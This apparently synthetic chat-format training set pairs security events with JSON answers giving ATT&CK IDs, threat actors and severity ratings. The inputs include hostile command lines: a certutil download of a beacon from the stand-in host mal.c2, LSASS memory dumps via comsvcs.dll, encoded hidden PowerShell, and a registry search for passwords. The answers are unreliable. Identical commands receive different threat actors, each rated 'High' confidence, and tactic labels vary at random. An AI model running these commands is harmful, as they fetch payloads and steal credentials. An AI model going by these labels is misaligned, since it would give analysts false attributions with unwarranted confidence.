messages
listlengths
2
2
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.117.186.112", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"te...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-JK0C2RSN3U)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Discovery, Collection, Privilege Escalation", "role": "user" }, { "c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1729 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidenc...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.30.116.92", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniqu...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.30.131.160", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilit...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3727 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-DQ1ZNTD6X9)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidenc...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor for API calls (such as GetAdaptersInfo() and GetIpNetTable()) that may gather details about the network configuration and settings, such as IP and/or MAC addresses.", "role": "user" }, { "content"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2702 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.107.115.147", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-6B39L6D7NP)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"High\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 514 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.51.63.114", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2374 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: TajMahal has the ability to use the open source libraries XZip/Xunzip and zlib to compress files.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1560.002\", \"T1560\"]}", "role": "assi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confide...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as Weaken Encryption.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techni...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3144 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.63.98.112", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"techni...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2216 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for changes made to the .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1371 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confid...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: If the mutex does not exist and a Windows Startup Registry key with name “System Update” does not exist, the malware performs its initialization routine by: Copying itself to the path %PROGRAMDATA%\\svchost.exe Sets...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-1Q4A5HAQ6L)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Impact, Privilege Escalation", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-Y641WHUD36)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Collection, Discovery, Command and Control", "role": "user" }, { "con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-RSVI75KIV3)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Cr...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-KCLFYWOWPI)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Lateral Movement, Defense Evasion", "role": "user" }, { "content": "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-4TKQQY5EOP)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\": \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"conf...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.82.179.207", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-5JRUOM175W)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access, Privilege Escalation, Exfiltration", "role": "user" }, ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: InvisiMole can use winapiexec tool for indirect execution of ShellExecuteW and CreateProcessA.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1106\"]}", "role": "assistan...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-I1F2RGBLIL)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Impact, Command and Control, Exfiltration", "role": "user" }, { "co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-HHPDRPJZY9)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Credential Access, Execution", "role": "user" }, { "content": "{\"severi...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.105.39.11", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0010\", \"TA0005\"], ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"co...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.119.155.224", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"T...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3407 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: reg query HKLM /f password /t REG_SZ /s", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\", \"T1552.002\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.95.196.194", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: nltest /domain_trusts", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.72.241.217", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\"], \"techniques\": [\"T1531...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.63.89.203", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-SINMZ792BR)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Credential Access, Defense Evasion", "role": "user" }, { "conte...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Credential dumpers may also use methods for reflective Process Injection to reduce potential indicators of malicious activity.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0007\"], \"techniques\": [\"T10...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.113.84.20", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Fysbis has the ability to delete files.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Leafminer obfuscated scripts that were used on victim machines.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.173.250.86", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: RunningRAT contains code to clear event logs.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.001\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-ZBCXZ0WHLQ)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"se...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2535 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.114.85.79", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0005...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-DU7SICHXV6)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Privilege Escalation", "role": "user" }, { ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Attor can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1564\", \"T15...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: From an infrastructure point of view there is no overlap between the two sets of activity, the only overlap is the use of the unique tool “DNSMessenger” When these points are considered together in conjunction with ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries can use scripts or manually run the commands launchctl load -w \"%s/Library/LaunchAgents/%s\" or /bin/launchctl load to execute Launch Agents or Launch Daemons.", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2215 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3098 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3487 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\": \"Hig...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: XCSSET uses AppleScript to check the host's language and location with the command user locale of (get system info).", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1614\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-UU2OTP4JOT)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Exfiltration", "role": "user" }, { "co...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: T9000 can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1126 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.119.131.127", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0006\"], \"techniques\":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 967 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\":...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: MoleNet can collect information about the about the system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 940 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.100.150.84", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0004\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 787 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"co...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2551 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.100.36.23", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0002\"], \"technique...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.136.174.247", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"T...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: nltest /domain_trusts", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-EN7ECE9JML)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Defense Evasion", "role": "user" }, { "content": "...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\",...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Mis-Type network traffic can communicate over a raw socket.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1095\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confidence\": ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: GrimAgent can collect the OS, and build version on a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3882 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: PoshC2 has a number of modules that leverage pass the hash for lateral movement.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0008\"], \"techniques\": [\"T1550.002\", \"T1550\"]}", "role": "assistant...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.133.150.226", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.96.31.91", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.163.120.63", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"tech...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-H4HOMQLDS1)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Collection, Privilege Escalation, Impact", "role": "user" }, { "content"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2569 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy (ex: Adversary-in-the-Middle) that can be set up by an adversary and used in phishing campaigns.", "role...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\": \"High\"}"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1210\"]}", "role": "ass...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Figure 1 – The main code from the .NET wrapper, with the Shellcode array being created and executed in a new thread", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.76.184.141", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0004\"], \"tec...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2669 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.154.203.35", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0010\", \"TA0005\"],...